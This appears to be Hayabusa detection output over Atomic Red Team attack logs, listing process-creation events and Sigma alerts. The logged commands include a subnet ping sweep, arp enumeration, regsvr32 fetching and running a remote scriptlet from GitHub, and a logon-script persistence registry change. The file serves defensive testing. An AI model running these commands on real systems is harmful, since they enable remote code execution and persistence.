+2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.224  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.225  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.226  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.227  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.228  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.229  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.230  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.231  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.232  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.233  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.234  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.235  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.236  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.237  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.238  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.239  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.240  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.241  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.242  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.243  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.244  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.245  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.246  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.247  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.248  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.249  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.250  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.251  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.252  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.253  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.254  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Suspicious Network Command,,rules/sigma/process_creation/win_pc_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: arp  -a  :  Path: C:\Windows\System32\ARP.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe  /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: regsvr32.exe  /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll  :  Path: C:\Windows\SysWOW64\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c  IF %%PROCESSOR_ARCHITECTURE%% ==AMD64  ELSE    :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command:  /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll  :  Path: C:\Windows\SysWOW64\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
